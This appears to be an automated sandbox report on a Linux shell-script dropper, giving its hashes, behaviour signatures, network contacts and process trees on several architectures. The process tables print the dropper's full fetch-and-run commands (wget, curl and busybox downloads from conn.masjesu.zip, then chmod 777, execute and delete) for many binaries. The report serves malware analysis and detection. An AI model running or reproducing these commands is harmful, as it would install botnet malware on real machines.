Analysis Overview
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
Threat Level: Shows suspicious behavior
The file 38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:24
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-mipsel-20240418-en
Max time kernel
85s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:28
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-armhf-20240418-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:24
Reported
2024-10-25 01:27
Platform
debian9-mipsbe-20240418-en
Max time kernel
82s
Max time network
83s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
Processes
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
[/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |